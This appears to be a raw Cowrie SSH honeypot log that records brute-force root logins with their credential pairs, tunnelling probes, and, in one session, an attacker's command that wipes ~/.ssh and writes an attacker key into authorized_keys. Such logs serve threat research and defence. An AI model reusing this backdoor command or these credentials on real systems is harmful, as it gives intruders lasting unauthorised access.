{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:53:11.156812Z","src_ip":"212.227.235.229","session":"e3ed0f1e4825"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:53:11.432078Z","src_ip":"212.227.235.229","session":"e3ed0f1e4825"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:53:11.482058Z","src_ip":"43.159.36.188","session":"b6ff8523b5f7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:53:12.576285Z","src_ip":"212.227.235.229","session":"e3ed0f1e4825"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:53:13.854846Z","src_ip":"212.227.235.229","session":"e3ed0f1e4825"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35868,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4c00c5f47f7","protocol":"ssh","message":"New connection: 212.227.235.229:35868 (1.2.3.4:22) [session: c4c00c5f47f7]","sensor":"my-vps","timestamp":"2025-08-31T05:53:14.124150Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:53:14.125199Z","src_ip":"212.227.235.229","session":"c4c00c5f47f7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:53:14.395544Z","src_ip":"212.227.235.229","session":"c4c00c5f47f7"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:53:15.520291Z","src_ip":"212.227.235.229","session":"c4c00c5f47f7"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:53:15.789257Z","src_ip":"212.227.235.229","session":"1b98fddc6236"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:53:15.791629Z","src_ip":"212.227.235.229","session":"c4c00c5f47f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46760,"dst_ip":"1.2.3.4","dst_port":22,"session":"1138f92f2a74","protocol":"ssh","message":"New connection: 212.227.125.160:46760 (1.2.3.4:22) [session: 1138f92f2a74]","sensor":"my-vps","timestamp":"2025-08-31T05:53:16.529694Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:53:24.225829Z","src_ip":"212.227.125.160","session":"1138f92f2a74"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:53:24.226799Z","src_ip":"212.227.125.160","session":"1138f92f2a74"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":11246,"dst_ip":"1.2.3.4","dst_port":22,"session":"83d61b7c11b7","protocol":"ssh","message":"New connection: 77.83.207.83:11246 (1.2.3.4:22) [session: 83d61b7c11b7]","sensor":"my-vps","timestamp":"2025-08-31T05:53:27.054304Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:53:27.055194Z","src_ip":"77.83.207.83","session":"83d61b7c11b7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T05:53:27.104795Z","src_ip":"77.83.207.83","session":"83d61b7c11b7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:53:27.355590Z","src_ip":"77.83.207.83","session":"83d61b7c11b7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":28045,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:28045","sensor":"my-vps","timestamp":"2025-08-31T05:53:27.407010Z","session":"83d61b7c11b7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T05:53:27.457381Z","src_ip":"77.83.207.83","session":"83d61b7c11b7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":22990,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:22990","sensor":"my-vps","timestamp":"2025-08-31T05:53:27.611288Z","session":"83d61b7c11b7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T05:53:27.661692Z","src_ip":"77.83.207.83","session":"83d61b7c11b7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":24665,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:24665","sensor":"my-vps","timestamp":"2025-08-31T05:53:27.804675Z","session":"83d61b7c11b7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T05:53:27.855144Z","src_ip":"77.83.207.83","session":"83d61b7c11b7"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:53:27.906749Z","src_ip":"77.83.207.83","session":"83d61b7c11b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39930,"dst_ip":"1.2.3.4","dst_port":22,"session":"f9beee28b4d2","protocol":"ssh","message":"New connection: 212.227.235.229:39930 (1.2.3.4:22) [session: f9beee28b4d2]","sensor":"my-vps","timestamp":"2025-08-31T05:53:28.294512Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:53:29.025560Z","src_ip":"212.227.235.229","session":"f9beee28b4d2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:53:29.026177Z","src_ip":"212.227.235.229","session":"f9beee28b4d2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55856,"dst_ip":"1.2.3.4","dst_port":22,"session":"664ade75b03a","protocol":"ssh","message":"New connection: 212.227.235.229:55856 (1.2.3.4:22) [session: 664ade75b03a]","sensor":"my-vps","timestamp":"2025-08-31T05:53:30.473098Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:53:30.473917Z","src_ip":"212.227.235.229","session":"664ade75b03a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:53:30.761828Z","src_ip":"212.227.235.229","session":"664ade75b03a"}
{"eventid":"cowrie.login.success","username":"root","password":"!@#sa321","message":"login attempt [root/!@#sa321] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:53:31.952397Z","src_ip":"212.227.235.229","session":"664ade75b03a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:53:32.546431Z","src_ip":"212.227.235.229","session":"664ade75b03a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:53:32.547145Z","src_ip":"212.227.235.229","session":"664ade75b03a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:53:32.547958Z","src_ip":"212.227.235.229","session":"664ade75b03a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:53:32.836869Z","src_ip":"212.227.235.229","session":"664ade75b03a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:53:33.909789Z","src_ip":"212.227.235.229","session":"664ade75b03a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:53:33.910517Z","src_ip":"212.227.235.229","session":"664ade75b03a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:53:34.200238Z","src_ip":"212.227.235.229","session":"664ade75b03a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:53:34.201143Z","src_ip":"212.227.235.229","session":"664ade75b03a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57412,"dst_ip":"1.2.3.4","dst_port":22,"session":"a0bc309d039c","protocol":"ssh","message":"New connection: 212.227.235.229:57412 (1.2.3.4:22) [session: a0bc309d039c]","sensor":"my-vps","timestamp":"2025-08-31T05:53:34.492001Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:53:34.492949Z","src_ip":"212.227.235.229","session":"a0bc309d039c"}
{"eventid":"cowrie.login.failed","username":"test2","password":"welcome","message":"login attempt [test2/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T05:53:34.677573Z","src_ip":"212.227.235.229","session":"f9beee28b4d2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:53:34.782420Z","src_ip":"212.227.235.229","session":"a0bc309d039c"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":53982,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff2aa80abe1b","protocol":"ssh","message":"New connection: 170.64.166.123:53982 (1.2.3.4:22) [session: ff2aa80abe1b]","sensor":"my-vps","timestamp":"2025-08-31T05:53:35.693099Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:53:35.693876Z","src_ip":"170.64.166.123","session":"ff2aa80abe1b"}
{"eventid":"cowrie.login.success","username":"root","password":"123321","message":"login attempt [root/123321] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:53:35.906902Z","src_ip":"212.227.125.160","session":"1138f92f2a74"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:53:35.968061Z","src_ip":"170.64.166.123","session":"ff2aa80abe1b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:53:35.980019Z","src_ip":"212.227.235.229","session":"a0bc309d039c"}
